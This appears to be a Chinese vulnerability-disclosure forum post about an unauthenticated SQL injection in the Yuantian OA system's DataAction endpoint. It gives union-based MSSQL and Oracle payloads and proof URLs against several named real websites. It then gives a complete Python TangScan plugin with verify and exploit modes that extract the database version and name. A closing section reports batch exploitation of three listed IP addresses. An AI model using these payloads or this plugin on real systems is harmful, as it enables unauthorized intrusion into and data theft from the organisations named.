首先. 支持TangScan.com是必须的 其次. 为写插件抛出一枚0day 最后. 夜观天象,貌似要下雨,不知会打雷不~~~
1)通用型SQL注入漏洞 厂商:源天软件 网址:http://www.visionsoft.com.cn/ 漏洞链接:ServiceAction/com.velcro.base.DataAction 说明:该oa系统使用mssql和oracle两个类型的数据库。 案例分别给出两种类型的利用poc。 利用POC:
MsSql数据库: ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
Oracle数据库: ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
漏洞证明(直接访问即可):
MsSql部分
A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle部分
D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true 2)说好的为了支持 TangScan 而来 直接给出编写好的插件代码(本人代码盲,瞎写的,大牛勿喷),等公布时,该插件已经入库 TangScan.com 。
#! /usr/bin/env python # -*- coding: utf-8 -*- """ Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/) See the file 'docs/COPYING' for copying permission author: fate0 <fate0@wooyun.org> """ import re from thirdparty import requests from modules.exploit import TSExploit __all__ = ['TangScan'] class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "源天软件OA办公系统 sql 注入MSSQL版漏洞(无需登录)", "product": "源天", "product_version": "", "desc": """ OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏 """, "license": self.license.TS, "author": ["Coody"], "ref": [ {self.ref.wooyun: "暂无"}, ], "type": self.type.injection, "severity": self.severity.high, "privileged": False, "disclosure_date": "2015-07-22", "create_date": "2015-07-23", } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "目标 url" } }) self.register_result({ "status": False, "data": { "db_info": { "version": "", "current_db": "" } }, "description": "", "error": "" }) def verify(self): self.print_debug("verify start") re_version_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url)) try: response = requests.get(exp_url, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_version_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.db_info.version = re_result[0] self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format( url=self.option.url, db_version=re_result[0] ) def exploit(self): self.print_debug("exploit start") re_userinfo_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url)) try: response = requests.get(exp_url, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_userinfo_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.db_info.current_db = re_result[0] self.result.description = "目标 {url} 存在sql注入, 数据库名称为: {current_db}".format( url=self.option.url, current_db=self.result.data.db_info.current_db ) if __name__ == '__main__': from modules.main import main main(TangScan())
看下执行插件后的结果:
执行 --mode verify (默认)
执行 --mode exploit
插件运行正常,能够顺利输出数据。。。。。。
到这里本来应该结束了 但是我手贱 给出批量检测网站的脚本测试结果 测试的网站分别是: http://60.12.113.234:8080/ http://121.14.195.31:8081/ http://218.246.22.194:8080/
测试中,直接执行 --mode exploit ,批量获取数据库名称吧。
测试完毕,看下结果文件 success.txt 内容
嗯、到这里该结束了···